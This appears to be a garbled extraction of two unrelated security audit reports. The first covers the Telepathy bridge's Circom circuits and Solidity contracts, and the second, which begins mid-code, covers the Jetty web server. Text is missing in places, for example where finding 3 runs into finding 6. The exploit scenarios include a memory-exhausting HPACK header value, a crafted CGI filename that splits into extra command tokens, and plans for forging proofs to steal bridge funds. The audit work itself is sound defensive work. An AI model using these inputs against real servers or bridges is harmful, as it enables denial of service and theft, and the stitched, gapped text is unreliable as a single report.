limbs less than 2 55 . This property is not validated anywhere in the Rotate circuit. By committing to a Poseidon root containing invalid BigInts, a malicious prover can prevent other provers from successfully proving a Step operation, bringing the light client to a halt and causing user funds to be stuck in the bridge. Furthermore, the invalid elliptic curve points would then be usable in the Step circuit, where they are passed without validation to the EllipticCurveAddUnequal function. The behavior of this function on ill-formed inputs is not specified and could allow a malicious prover to forge Step proofs without a valid sync committee signature. Figure 1.1 shows where the untrusted pubkeysBigIntY value is passed to the SubgroupCheckG1WithValidX template. /* VERIFY THAT THE WITNESSED Y-COORDINATES MAKE THE PUBKEYS LAY ON THE CURVE */ component isValidPoint[SYNC_COMMITTEE_SIZE]; for ( var i = 0 ; i < SYNC_COMMITTEE_SIZE; i++) { isValidPoint[i] = SubgroupCheckG1WithValidX(N, K); for ( var j = 0 ; j < K; j++) { isValidPoint[i]. in [ 0 ][j] <== pubkeysBigIntX[i][j]; isValidPoint[i]. in [ 1 ][j] <== pubkeysBigIntY[i][j]; } } Figure 1.1: telepathy/circuits/circuits/rotate.circom#101–109 Exploit Scenario Alice, a malicious prover, uses a valid block header containing a sync committee update to generate a Rotate proof. Instead of using correctly formatted BigInts to represent the Y values of each public key point, she modifies the value by subtracting one from the most significant limb and adding 2 55 to the second-most significant limb. She then posts the resulting proof to the LightClient contract via the rotate function, which updates the sync committee commitment to Alice’s Poseidon commitment containing ill-formed Y coordinates. Future provers would then be unable to use the default witness generator to make new proofs, locking user funds in the bridge. Alice may be able to then exploit invalid assumptions in the Step circuit to forge Step proofs and steal bridge funds. Recommendations Short term, use a Num2Bits component to verify that each limb of the pubkeysBigIntY witness value is less than 2 55 . Long term, clearly document and validate the input assumptions of templates such as SubgroupCheckG1WithValidX . Consider adopting Circom signal tags to automate the checking of these assumptions. +2. Prover can lock user funds by supplying non-reduced Y values to G1BigIntToSignFlag Severity: High Difficulty: Low Type: Data Validation Finding ID: TOB-SUCCINCT-2 Target: circuits/circuits/rotate.circom Description The G1BigIntToSignFlag template does not check whether its input is a value properly reduced mod p . A malicious prover can lock user funds by carefully selecting malformed public keys and using the Rotate function, which will prevent future provers from using the default witness generator to make new proofs. During the Rotate proof, when translating compressed public keys to full (X, Y) form, the prover must supply a Y value with a sign corresponding to the sign bit of the compressed public key. The circuit calculates the sign of Y by passing the Y coordinate (supplied by the prover and represented as a BigInt) to the G1BigIntToSignFlag component (figure 2.1). This component determines the sign of Y by checking if 2*Y >= p . However, the correctness of this calculation depends on the Y value being less than p ; otherwise, a positive, non-reduced value such as p + 1 will be incorrectly interpreted as negative. A malicious prover could use this fact to commit to a non-reduced form of Y that differs in sign from the correct public key. This invalid commitment would prevent future provers from generating Step circuit proofs and thus halt the LightClient , trapping user funds in the Bridge . template G1BigIntToSignFlag(N, K) { signal input in [K]; signal output out; var P[K] = getBLS128381Prime(); var LOG_K = log_ceil(K); component mul = BigMult(N, K); signal two[K]; for ( var i = 0 ; i < K; i++) { if (i == 0 ) { two[i] <== 2 ; } else { two[i] <== 0 ; } } for ( var i = 0 ; i < K; i++) { mul.a[i] <== in [i]; mul.b[i] <== two[i]; } component lt = BigLessThan(N, K); for ( var i = 0 ; i < K; i++) { lt.a[i] <== mul.out[i]; lt.b[i] <== P[i]; } out <== 1 - lt.out; } Figure 2.1: telepathy/circuits/circuits/bls.circom#197–226 Exploit Scenario Alice, a malicious prover, uses a valid block header containing a sync committee update to generate a Rotate proof. When one of the new sync committee members’ public key Y value has a negative sign, Alice substitutes it with 2P - Y . This value is congruent to -Y mod p , and thus has positive sign; however, the G1BigIntToSignFlag component will determine that it has negative sign and validate the inclusion in the Poseidon commitment. Future provers will then be unable to generate proofs from this commitment since the committed public key set does not match the canonical sync committee. Recommendations Short term, constrain the pubkeysBigIntY values to be less than p using BigLessThan . Long term, constrain all private witness values to be in canonical form before use. Consider adopting Circom signal tags to automate the checking of these assumptions. +3. Incorrect handling of point doubling can allow signature forgery Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-SUCCINCT-3 Target: telepathy/circuits/circuits/bls.circom Description When verifying the sync committee signature, individual public keys are aggregated into an overall public key by repeatedly calling G1Add in a tree structure. Due to the mishandling of elliptic curve point doublings, a minority of carefully selected public keys can cause the aggregation to result in an arbitrary, maliciously chosen public key, allowing signature forgeries and thus malicious light client updates. When bit1 and bit2 of G1Add are both set, G1Add computes out by calling EllipticCurveAddUnequal : template parallel G1Add(N, K) { var P[ 7 ] = getBLS128381Prime(); signal input pubkey1[ 2 ][K]; signal input pubkey2[ 2 ][K]; signal input bit1; signal input bit2; /* COMPUTE BLS ADDITION */ signal output out[ 2 ][K]; signal output out_bit; out_bit <== bit1 + bit2 - bit1 * bit2; component adder = EllipticCurveAddUnequal( 55 , 7 , P); for ( var i = 0 ; i < 2 ; i++) { for ( var j = 0 ; j < K; j++) { adder.a[i][j] <== pubkey1[i][j]; adder.b[i][j] <== pubkey2[i][j]; } } Figure 3.1: telepathy/circuits/circuits/bls.circom#82– The results of EllipticCurveAddUnequal are constrained by equations that reduce to 0 = 0 if a and b are equal: // constrain x_3 by CUBIC (x_1 + x_2 + x_3) * (x_2 - x_1)^2 - (y_2 - y_1)^2 = 0 mod p component dx_sq = BigMultShortLong(n, k, 2 *n+LOGK+ 2 ); // 2k-1 registers abs val < k*2^{2n} component dy_sq = BigMultShortLong(n, k, 2 *n+LOGK+ 2 ); // 2k-1 registers < k*2^{2n} for ( var i = 0 ; i < k; i++){ dx_sq.a[i] <== b[ 0 ][i] - a[ 0 ][i]; dx_sq.b[i] <== b[ 0 ][i] - a[ 0 ][i]; dy_sq.a[i] <== b[ 1 ][i] - a[ 1 ][i]; dy_sq.b[i] <== b[ 1 ][i] - a[ 1 ][i]; } [...] component cubic_mod = SignedCheckCarryModToZero(n, k, 4 *n + LOGK3, p); for ( var i= 0 ; i 0 ) { POSEIDON_SIZE = 16 ; } hashers[i] = Poseidon(POSEIDON_SIZE); for ( var j = 0 ; j < 15 ; j++) { if (i * 15 + j >= LENGTH ) { hashers[i].inputs[j] <== 0 ; } else { hashers[i].inputs[j] <== in [i*15 + j]; } } if (i > 0 ) { hashers[i].inputs[15] <== hashers[i- 1]. out ; } } out <== hashers[NUM_HASHERS-1]. out ; } Figure 6.1: telepathy/circuits/circuits/poseidon.circom#25–51 The Poseidon authors recommend using a sponge construction, which has better provable security properties than the MD construction. One could implement a sponge by using PoseidonEx with nOuts = 1 for intermediate calls and nOuts = 2 for the final call. For each call, out[0] should be passed into the initialState of the next PoseidonEx component, and out[1] should be used for the final output. By maintaining out[0] as hidden capacity, the overall construction will closely approximate a pseudorandom function. Although the MD construction offers sufficient protection against collision for the current commitment use case, hash functions constructed in this manner do not fully model random functions. Future uses of the PoseidonFieldArray circuit may expect stronger cryptographic properties, such as resistance to length extension. Additionally, by utilizing the initialState input, as shown in figure 6.2, on each permutation call, 16 inputs can be compressed per template instantiation, as opposed to the current 15, without any additional cost per compression. This will reduce the number of compressions required and thus reduce the size of the circuit. template PoseidonEx(nInputs, nOuts) { signal input inputs[nInputs]; signal input initialState; signal output out [nOuts]; Figure 6.2: circomlib/circuits/poseidon.circom#67–70 Recommendations Short term, convert PoseidonFieldArray to use a sponge construction, ensuring that out[0] is preserved as a hidden capacity value. Long term, ensure that all hashing primitives are used in accordance with the published recommendations. +7. Merkle root reconstruction is vulnerable to forgery via proofs of incorrect length Severity: High Difficulty: Low Type: Cryptography Finding ID: TOB-SUCCINCT-7 Target: contracts/src/libraries/SimpleSerialize.sol Description The TargetAMB contract accepts and verifies Merkle proofs that a particular smart contract event was issued in a particular Ethereum 2.0 beacon block. Because the proof validation depends on the length of the proof rather than the index of the value to be proved, Merkle proofs with invalid lengths can be used to mislead the verifier and forge proofs for nonexistent transactions. The SSZ.restoreMerkleRoot function reconstructs a Merkle root from the user-supplied transaction receipt and Merkle proof; the light client then compares the root against the known-good value stored in the LightClient contract. The index argument to restoreMerkleRoot determines the specific location in the block state tree at which the leaf node is expected to be found. The arguments leaf and branch are supplied by the prover, while the index argument is calculated by the smart contract verifier. function restoreMerkleRoot ( bytes32 leaf , uint256 index , bytes32 [] memory branch) internal pure returns ( bytes32 ) { } bytes32 value = leaf; for ( uint256 i = 0 ; i < branch.length; i++) { if ((index / ( 2 ** i)) % 2 == 1 ) { value = sha256( bytes .concat(branch[i], value)); } else { value = sha256( bytes .concat(value, branch[i])); } } return value; Figure 7.1: telepathy/contracts/src/libraries/SimpleSerialize.sol#24–38 A malicious user may supply a proof (i.e., a branch list) that is longer or shorter than the number of bits in the index . In this case, the leaf value will not in fact correspond to the receiptRoot but to some other value in the tree. In particular, the user can convince the smart contract that receiptRoot is the value at any generalized index given by truncating the leftmost bits of the true index or by extending the index by arbitrarily many zeroes following the leading set bit. If one of these alternative indexes contains data controllable by the user, who may for example be the block proposer, then the user can forge a proof for a transaction that did not occur and thus steal funds from bridges relying on the TargetAMB . Exploit Scenario Alice, a malicious ETH2.0 validator, encodes a fake transaction receipt hash encoding a deposit to a cross-chain bridge into the graffiti field of a BeaconBlock . She then waits for the block to be added to the HistoricalBlocks tree and further for the generalized index of the historical block to coincide with an allowable index for the Merkle tree reconstruction. She then calls executeMessageFromLog with the transaction receipt, allowing her to withdraw from the bridge based on a forged proof of deposit and steal funds. Recommendations Short term, rewrite restoreMerkleRoot to loop over the bits of index , e.g. with a while loop terminating when index = 1 . Long term, ensure that proof verification routines do not use control flow determined by untrusted input. The verification routine for each statement to be proven should treat all possible proofs uniformly. +8. LightClient forced finalization could allow bad updates in case of a DoS Severity: High Difficulty: Medium Type: Access Controls Finding ID: TOB-SUCCINCT-8 Target: contracts/src/lightclient/LightClient.sol Description Under periods of delayed finality, the LightClient may finalize block headers with few validators participating. If the Telepathy provers were targeted by a denial-of-service (DoS) attack, this condition could be triggered and used by a malicious validator to take control of the LightClient and finalize malicious block headers. The LightClient contract typically considers a block header to be finalized if it is associated with a proof that more than two-thirds of sync committee participants have signed the header. Typically, the sync committee for the next period is determined from a finalized block in the current period. However, in the case that the end of the sync committee period is reached before any block containing a sync committee update is finalized, a user may call the LightClient.force function to apply the update with the most signatures, even if that update has less than a majority of signatures. A forced update may have as few as 10 participating signers, as determined by the constant MIN_SYNC_COMMITTEE_PARTICIPANTS . /// @notice In the case there is no finalization for a sync committee rotation, this method /// is used to apply the rotate update with the most signatures throughout the period. /// @param period The period for which we are trying to apply the best rotate update for. function force ( uint256 period ) external { LightClientRotate memory update = bestUpdates[period]; uint256 nextPeriod = period + 1 ; if (update.step.finalizedHeaderRoot == 0 ) { revert( "Best update was never initialized" ); } else if (syncCommitteePoseidons[nextPeriod] != 0 ) { revert( "Sync committee for next period already initialized." ); } else if (getSyncCommitteePeriod(getCurrentSlot()) < nextPeriod) { revert( "Must wait for current sync committee period to end." ); } setSyncCommitteePoseidon(nextPeriod, update.syncCommitteePoseidon); } Figure 8.1: telepathy/contracts/src/lightclient/LightClient.sol#123– Proving sync committee updates via the rotate ZK circuit requires significant computational power; it is likely that there will be only a few provers online at any given time. In this case, a DoS attack against the active provers could cause the provers to be offline for a full sync committee period (~27 hours), allowing the attacker to force an update with a small minority of validator stake. The attacker would then gain full control of the light client and be able to steal funds from any systems dependent on the correctness of the light client. Exploit Scenario Alice, a malicious ETH2.0 validator, controls about 5% of the total validator stake, split across many public keys. She waits for a sync committee period, includes at least 10 of her public keys, then launches a DoS against the active Telepathy provers, using an attack such as that described in TOB-SUCCINCT-1 or an attack against the offchain prover/relayer client itself. Alice creates a forged beacon block with a new sync committee containing only her own public keys, then uses her 10 active committee keys to sign the block. She calls LightClient.rotate with this forged block and waits until the sync committee period ends, finally calling LightClient.force to gain control over all future light client updates. Recommendations Short term, consider removing the LightClient.force function, extending the waiting period before updates may be forced, or introducing a privileged role to mediate forced updates. Long term, explicitly document expected liveness behavior and associated safety tradeoffs. +9. G1AddMany does not check for the point at infinity Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-SUCCINCT-9 Target: circuits/circuits/{sync_committee.circom, bls.circom} Description The G1AddMany circuit aggregates multiple public keys into a single public key before verifying the BLS signature. The outcome of the aggregation is used within CoreVerifyPubkeyG1 as the public key. However, G1AddMany ignores the value of the final out_bits , and wrongly converts a point at infinity to a different point when all participation bits are zero. template G1AddMany(SYNC_COMMITTEE_SIZE, LOG_2_SYNC_COMMITTEE_SIZE, N, K) { signal input pubkeys[SYNC_COMMITTEE_SIZE][ 2 ][K]; signal input bits[SYNC_COMMITTEE_SIZE]; signal output out[ 2 ][K]; [...] for ( var i = 0 ; i < 2 ; i++) { for ( var j = 0 ; j < K; j++) { out[i][j] <== reducers[LOG_2_SYNC_COMMITTEE_SIZE- 1 ].out[ 0 ][i][j]; } } } Figure 9.1: BLS key aggregation without checks for all-zero participation bits ( telepathy/circuits/circuits/bls.circom#16–48 ) Recommendations Short term, augment the G1AddMany template with an output signal that indicates whether the aggregated public key is the point at infinity. Check that the aggregated public key is non-zero in the calling circuit by verifying that the output of G1AddMany is not the point at infinity (for instance, in VerifySyncCommitteeSignature ). Long term, assert that all provided elliptic curve points are non-zero before converting them to affine form and using them where a non-zero point is expected. +10. TargetAMB receipt proof may behave unexpectedly on future transaction types Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-SUCCINCT-10 Target: contracts/src/libraries/StateProofHelper.sol Description The TargetAMB contract can relay transactions from the SourceAMB via events logged in transaction receipts. The contract currently ignores the version specifier in these receipts, which could cause unexpected behavior in future upgrade hard-forks. To relay a transaction from a receipt, the user provides a Merkle proof that a particular transaction receipt is present in a specified block; the relevant event is then parsed from the transaction receipt by the TargetAMB . function getEventTopic (...){ ... bytes memory value = MerklePatriciaProofVerifier.extractProofValue(receiptRoot, key, proofAsRLP); RLPReader.RLPItem memory valueAsItem = value.toRlpItem(); if (!valueAsItem.isList()) { // TODO: why do we do this ... valueAsItem.memPtr++; valueAsItem.len--; } RLPReader.RLPItem[] memory valueAsList = valueAsItem.toList(); require (valueAsList.length == 4 , "Invalid receipt length" ); // In the receipt, the 4th entry is the logs RLPReader.RLPItem[] memory logs = valueAsList[ 3 ].toList(); require (logIndex < logs.length, "Log index out of bounds" ); RLPReader.RLPItem[] memory relevantLog = logs[logIndex].toList(); ... } Figure 10.1: telepathy/contracts/src/libraries/StateProofHelper.sol#L44–L82 The logic in figure 10.1 checks if the transaction receipt is an RLP list; if it is not, the logic skips one byte of the receipt before continuing with parsing. This logic is required in order to properly handle legacy transaction receipts as defined in EIP-2718 . Legacy transaction receipts directly contain the RLP-encoded list rlp([status, cumulativeGasUsed, logsBloom, logs]) , whereas EIP- TransactionType|| TransactionPayload , where TransactionType is a one-byte indicator between 0x00 and 0x7f and TransactionPayload may vary depending on the transaction type. Current valid transaction types are 0x01 and 0x02 . New transaction types may be added during routine Ethereum upgrade hard-forks. The TransactionPayload field of type 0x01 and 0x02 transactions corresponds exactly to the LegacyTransactionReceipt format; thus, simply skipping the initial byte is sufficient to handle these cases. However, EIP-2718 does not guarantee this backward compatibility, and future hard-forks may introduce transaction types for which this parsing method gives incorrect results. Because the current implementation lacks explicit validation of the transaction type, this discrepancy may go unnoticed and lead to unexpected behavior. Exploit Scenario An Ethereum upgrade fork introduces a new transaction type with a corresponding transaction receipt format that differs from the legacy format. If the new format has the same number of fields but with different semantics in the fourth slot, it may be possible for a malicious user to insert into that slot a value that parses as an event log for a transaction that did not take place, thus forging an arbitrary bridge message. Recommendations Short term, check the first byte of valueAsItem against a list of allowlisted transaction types, and revert if the transaction type is invalid. Long term, plan for future incompatibilities due to upgrade forks; for example, consider adding a semi-trusted role responsible for adding new transaction type identifiers to an allowlist. +11. RLPReader library does not validate proper RLP encoding Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-SUCCINCT-11 Target: contracts/lib/Solidity-RLP/RLPReader.sol Description The TargetAMB uses the external RLPReader dependency to parse RLP-encoded nodes in the Ethereum state trie, including those provided by the user as part of a Merkle proof. When parsing a byte string as an RLPItem , the library does not check that the encoded payload length of the RLPitem matches the length of the underlying bytes. /* * @param item RLP encoded bytes */ function toRlpItem ( bytes memory item) internal pure returns (RLPItem memory ) { uint256 memPtr ; assembly { memPtr := add(item, 0x20 ) } return RLPItem(item.length, memPtr); } Figure 11.1: Solidity-RLP/contracts/RLPReader.sol#51–61 If the encoded byte length of the RLPitem is too long or too short, future operations on the RLPItem may access memory before or after the bounds of the underlying buffer. More generally, because the Merkle trie verifier assumes that all input is in the form of valid RLP-encoded data, it is important to check that potentially malicious data is properly encoded. While we did not identify any way to convert improperly encoded proof data into a proof forgery, it is simple to give an example of an out-of-bounds read that could possibly lead in other contexts to unexpected behavior. In figure 11.2, the result of items[0].toBytes() contains many bytes read from memory beyond the bounds allocated in the initial byte string. RLPReader.RLPItem memory item = RLPReader.toRlpItem( '\xc3\xd0' ); RLPReader.RLPItem[] memory items = item.toList(); assert(items[ 0 ].toBytes().length == 16 ); Figure 11.2: Out-of-of-bounds read due to invalid RLP encoding In this example, RLPReader.toRLPItem should revert because the encoded length of three bytes is longer than the payload length of the string; similarly, the call to toList() should fail because the nested RLPItem encodes a length of 16, again more than the underlying buffer. To prevent such ill-constructed nested RLPItem s, the internal numItems function should revert if currPtr is not exactly equal to endPtr at the end of the loop shown in figure 11.3. // @return number of payload items inside an encoded list. function numItems (RLPItem memory item) private pure returns ( uint256 ) { if (item.len == 0 ) return 0 ; uint256 count = 0 ; uint256 currPtr = item.memPtr + _payloadOffset(item.memPtr); uint256 endPtr = item.memPtr + item.len; while (currPtr < endPtr) { currPtr = currPtr + _itemLength(currPtr); // skip over an item count++; } return count; } Figure 11.3: Solidity-RLP/contracts/RLPReader.sol#256–269 Recommendations Short term, add a check in RLPReader.toRLPItem that validates that the length of the argument exactly matches the expected length of prefix + payload based on the encoded prefix. Similarly, add a check in RLPReader.numItems , checking that the sum of the encoded lengths of sub-objects matches the total length of the RLP list. Long term, treat any length values or pointers in untrusted data as potentially malicious and carefully check that they are within the expected bounds. +12. TargetAMB _executeMessage lacks contract existence checks Severity: Low Difficulty: Low Type: Error Reporting Finding ID: TOB-SUCCINCT-12 Target: contracts/src/amb/TargetAMB.sol Description When relaying messages on the target chain, the TargetAMB records the success or failure of the external contract call so that off-chain clients can track the success of their messages. However, if the recipient of the call is an externally owned-account or is otherwise empty, the handleTelepathy call will appear to have succeeded when it was not processed by any recipient. bytes memory recieveCall = abi.encodeWithSelector( ITelepathyHandler.handleTelepathy.selector, message.sourceChainId, message.senderAddress, message.data ); address recipient = TypeCasts.bytes32ToAddress(message.recipientAddress); (status,) = recipient.call(recieveCall); if (status) { messageStatus[messageRoot] = MessageStatus.EXECUTION_SUCCEEDED; } else { messageStatus[messageRoot] = MessageStatus.EXECUTION_FAILED; } Figure 12.1: telepathy/contracts/src/amb/TargetAMB.sol#150–164 Exploit Scenario A user accidentally sends a transaction to the wrong address or an address that does not exist on the target chain. The UI displays the transaction as successful, possibly confusing the user further. Recommendations Short term, change the handleTelepathy interface to expect a return value and check that the return value is some magic constant, such as the four-byte ABI selector. See OpenZeppelin’s safeTransferFrom / IERC721Reciever pattern for an example. Long term, ensure that all low-level calls behave as expected when handling externally owned accounts. +13. LightClient is unable to verify some block headers Severity: Medium Difficulty: Low Type: Authentication Finding ID: TOB-SUCCINCT-13 Target: contracts/src/lightclient/LightClient.sol This issue was discovered and relayed to the audit team by the Telepathy developers. We include it here for completeness and to provide our fix recommendations. Description The LightClient contract expects beacon block headers produced in a period prior to the period in which they are finalized to be signed by the wrong sync committee; those blocks will not be validated by the LightClient , and AMB transactions in these blocks may be delayed. The Telepathy light client tracks only block headers that are “finalized,” as defined by the ETH2.0 Casper finality mechanism. Newly proposed, unfinalized beacon blocks contain a finalized_checkpoint field with the most recently finalized block hash. The Step circuit currently exports only the slot number of this nested, finalized block as a public input. The LightClient contract uses this slot number to determine which sync committee it expects to sign the update. However, the correct slot number for this use is in fact that of the wrapping, unfinalized block. In some cases, such as near the edge of a sync committee period or during periods of delayed finalization, the two slots may not belong to the same sync committee period. In this case, the signature will fail to verify, and the LightClient will become unable to validate the block header. Exploit Scenario A user sends an AMB message using the SourceAMB.sendViaLog function. The beacon block in which this execution block is included is late within a sync committee period and is not finalized on the beacon chain until the next period. The new sync committee signs the block, but this signature is rejected by the light client because it expects a signature from the old committee. Because this header cannot be finalized in the light client, the TargetAMB cannot relay the message until some future block in the new sync committee period is finalized in the light client, causing delivery delays. Recommendations Short term, Include attestedSlot in the public input commitment to the Step circuit. This can be achieved at no extra cost by packing the eight-byte attestedSlot value alongside the eight-byte finalizedSlot value, which currently is padded to 32 bytes. Long term, add additional unit and end-to-end tests to focus on cases where blocks are near the edges of epochs and sync committee periods. Further, reduce gas usage and circuit complexity by packing all public inputs to the step function into a single byte array that is hashed in one pass, rather than chaining successive calls to SHA-256, which reduces the effective rate by half and incurs overhead due to the additional external precompile calls. +14. OptSimpleSWU2 Y-coordinate output is underconstrained Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-SUCCINCT-14 Target: circuits/circuits/pairing/bls12_381_hash_to_G2.circom Description The OptSimpleSWU2 circuit does not check that its Y-coordinate output is a properly formatted BigInt. This violates the canonicity assumptions of the Fp2Sgn0 circuit and other downstream components, possibly leading to unexpected nondeterminism in the sign of the output of MapToG2 . Incorrect results from MapToG2 would cause the circuit to verify the provided signature against a message different from that in the public input. While this does not allow malicious provers to forge signatures on arbitrary messages, this additional degree of freedom in witness generation could interact negatively with future changes to the codebase or instantiations of this circuit. var Y[2][50]; ... component Y_sq = Fp2Multiply(n, k, p); // Y^ 2 == g(X) for ( var i= 0 ; i< 2 ; i++) for ( var idx= 0 ; idx _maxSize) throw new HpackException.SessionException( "Header too large %d > %d" , Figure 1.1: MetaDataBuilder.checkSize However, when the value of length is very large and huffman is true , the multiplication of length by 4 in line 295 will overflow, and length will become negative. This will cause the result of the sum of _size and length to be negative, and the check on line 296 will not be triggered. Exploit Scenario An attacker repeatedly sends HTTP messages with the HPACK header 0x00ffffffffff02 . Each time this header is decoded, the following occurs: ● HpackDecode.decode determines that a Huffman-coded value of length 805306494 needs to be decoded. 36 OSTIF Eclipse: Jetty Security Assessment ● MetaDataBuilder.checkSize approves this length. ● Huffman.decode allocates a 1.6 GB string array. ● Huffman.decode experiences a buffer overflow error, and the array is deallocated the next time garbage collection happens. (Note that this deallocation can be delayed by appending valid Huffman-coded characters to the end of the header.) Depending on the timing of garbage collection, the number of threads, and the amount of memory available on the server, this may cause the server to run out of memory. Recommendations Short term, have MetaDataBuilder.checkSize check that length is below a threshold before performing the multiplication. Long term, use fuzzing to check for similar errors; we found this issue by fuzzing HpackDecode . 37 OSTIF Eclipse: Jetty Security Assessment +2. Cookie parser accepts unmatched quotation marks Severity: Informational Difficulty: High Type: Error Reporting Finding ID: TOB-JETTY-2 Target: org.eclipse.jetty.http.RFC6265CookieParser Description The RFC6265CookieParser.parseField function does not check for unmatched quotation marks. For example, parseField(“\””) will execute without raising an exception. This issue is unlikely to lead to any vulnerabilities, but it could lead to problems if users or developers expect the function to accept only valid strings. Recommendations Short term, modify the function to check that the state at the end of the given string is not IN_QUOTED_VALUE . Long term, when using a state machine, ensure that the code always checks that the state is valid before exiting. 38 OSTIF Eclipse: Jetty Security Assessment +3. Errant command quoting in CGI servlet Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-3 Target: org.eclipse.jetty.ee10.servlets.CGI , org.eclipse.jetty.ee9.servlets.CGI Description If a user sends a request to a CGI servlet for a binary with a space in its name, the servlet will escape the command by wrapping it in quotation marks. This wrapped command, plus an optional command prefix, will then be executed through a call to Runtime.exec . If the original binary name provided by the user contains a quotation mark followed by a space, the resulting command line will contain multiple tokens instead of one. For example, if a request references a binary called file” name “here , the escaping algorithm will generate the command line string “file” name “here” , which will invoke the binary named file , not the one that the user requested. if (execCmd.length() > 0 && execCmd.charAt( 0 ) != '"' && execCmd.contains( " " )) execCmd = "\"" + execCmd + "\"" ; Figure 3.1: CGI.java#L337–L338 Exploit Scenario The cgi-bin directory contains a binary named exec and a subdirectory named exec” commands , which contains a file called bin1 . A user sends to the CGI servlet a request for the filename exec” commands/bin1 . This request passes the file existence check on lines 194 through 205 in CGI.java . The servlet adds quotation marks around this filename, resulting in the command line string “exec” commands/bin1” . When this string is passed to Runtime.exec , instead of executing the bin1 binary, the server executes the exec binary with the argument commands/bin1” . This behavior is incorrect and could bypass alias checks; it could also cause other unintended behaviors if a command prefix is configured. Additionally, if the useFullPath configuration setting is off, the command would not need to pass the existence check. Without this setting, an attacker exploiting this issue would not have to rely on a binary and subdirectory with similar names, and the attack could succeed on a much wider variety of directory structures. 39 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, update line 346 in CGI.java to replace the call to exec(String command, String[] env, File dir) with a call to exec(String[] cmdarray, String[] env, File dir) so that the quotation mark escaping algorithm does not create new tokens in the command line string. Long term, update the quotation mark escaping algorithm so that any unescaped quotation marks in the original name of the command are properly escaped, resulting in one double-quoted token instead of multiple adjacent quoted strings. Additionally, the expression execCmd.charAt(0) != '"' on line 337 of CGI.java is intended to avoid adding additional quotation marks to an already-quoted command string. If this check is unnecessary, it should be removed. If it is necessary, it should be replaced by a more robust check that accurately detects properly formatted double-quoted strings. 40 OSTIF Eclipse: Jetty Security Assessment +4. Symlink-allowed alias checker ignores protected targets list Severity: High Difficulty: Medium Type: Access Controls Finding ID: TOB-JETTY-4 Target: org.eclipse.jetty.server.SymlinkAllowedResourceAliasChecker Description The class SymlinkAllowedResourceAliasChecker is an alias checker that permits users to access a symlink as long as the symlink is stored within an allowed directory. The following comment appears on line 76 of this class: // TODO: return !getContextHandler().isProtectedTarget(realURI.toString()); Figure 4.1: SymlinkAllowedResourceAliasChecker.java#L76 As this comment suggests, the alias checker does not yet enforce the context handler’s protected resource list. That is, if a symlink is contained in an allowed directory but points to a target on the protected resource list, the alias checker will return a positive match. During our review, we found that some other modules, but not all, independently enforce the protected resource list and will decline to serve resources on the list even if the alias checker returns a positive result. But the modules that do not independently enforce the protected resource list could serve protected resources to attackers conducting symlink attacks. Exploit Scenario An attacker induces the creation of a symlink (or a system administrator accidentally creates one) in a web-accessible directory that points to a protected resource (e.g., a child of WEB-INF ). By requesting this symlink through a servlet that uses the SymlinkAllowedResourceAliasChecker class, the attacker bypasses the protected resource list and accesses the sensitive files. Recommendations Short term, implement the check referenced in the comment so that the alias checker rejects symlinks that point to a protected resource or a child of a protected resource. Long term, consider clarifying and documenting the responsibilities of different components for enforcing protected resource lists. Consider implementing redundant checks in multiple modules for purposes of layered security. 41 OSTIF Eclipse: Jetty Security Assessment +5. Missing check for malformed Unicode escape sequences in QuotedStringTokenizer.unquote Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-JETTY-5 Target: org.eclipse.jetty.util.QuotedStringTokenizer Description The QuotedStringTokenizer class’s unquote method parses \u#### Unicode escape sequences, but it does not first check that the escape sequence is properly formatted or that the string is of a sufficient length: case 'u' : b.append(( char )( (TypeUtil.convertHexDigit(( byte )s.charAt(i++)) << 24 ) + (TypeUtil.convertHexDigit(( byte )s.charAt(i++)) << 16 ) + (TypeUtil.convertHexDigit(( byte )s.charAt(i++)) << 8 ) + (TypeUtil.convertHexDigit(( byte )s.charAt(i++))) ) ); break ; Figure 5.1: QuotedStringTokenizer.java#L547–L555 Any calls to this function with an argument ending in an incomplete Unicode escape sequence, such as “str\u0” , will cause the code to throw a java.lang.NumberFormatException exception. The only known execution path that will cause this method to be called with a parameter ending in an invalid Unicode escape sequence is to induce the processing of an ETag Matches header by the ResourceService class, which calls EtagUtils.matches , which calls QuotedStringTokenizer.unquote . Exploit Scenario An attacker introduces a maliciously crafted ETag into a browser’s cache. Each subsequent request for the affected resource causes a server-side exception, preventing the server from producing a valid response so long as the cached ETag remains in place. Recommendations Short term, add a try-catch block around the affected code that drops malformed escape sequences. 42 OSTIF Eclipse: Jetty Security Assessment Long term, implement a suitable workaround for lenient mode that passes the raw bytes of the malformed escape sequence into the output. 43 OSTIF Eclipse: Jetty Security Assessment +6. WebSocket frame length represented with 32-bit integer Severity: High Difficulty: Medium Type: Data Validation Finding ID: TOB-JETTY-6 Target: org.eclipse.jetty.websocket.core.internal.Parser Description The WebSocket standard (RFC 6455) allows for frames with a size of up to 2 64 bytes. However, the WebSocket parser represents the frame length with a 32-bit integer: private int payloadLength; // ...[snip]... case PAYLOAD_LEN_BYTES: { } byte b = buffer.get(); --cursor; payloadLength |= (b & 0xFF ) << ( 8 * cursor); // ...[snip]... Figure 6.1: Parser.java , lines 57 and 147–151 As a result, this parsing algorithm will incorrectly parse some length fields as negative integers, causing a java.lang.IllegalArgumentException exception to be thrown when the parser tries to set the limit of a Buffer object to a negative number (refer to TOB-JETTY-7 ). Consequently, Jetty’s WebSocket implementation cannot properly process frames with certain lengths that are compliant with RFC 6455. Even if no exception results, this logic error will cause the parser to incorrectly identify the sizes of WebSocket frames and the boundaries between them. If the server passes these frames to another WebSocket connection, this bug could enable attacks similar to HTTP request smuggling, resulting in bypasses of security controls. Exploit Scenario A Jetty WebSocket server is deployed in a reverse proxy configuration in which both Jetty and another web server parse the same stream of WebSocket frames. An attacker sends a frame with a length that the Jetty parser incorrectly truncates to a 32-bit integer. Jetty and the other server interpret the frames differently, which causes errors in the implementation of security controls, such as WAF filters. 44 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, change the payloadLength variable to use the long data type instead of an int . Long term, audit all arithmetic operations performed on this payloadLength variable to ensure that it is always used as an unsigned integer instead of a signed one. The standard library’s Integer class can provide this functionality. 45 OSTIF Eclipse: Jetty Security Assessment +7. WebSocket parser does not check for negative payload lengths Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-JETTY-7 Target: org.eclipse.jetty.websocket.core.internal.Parser 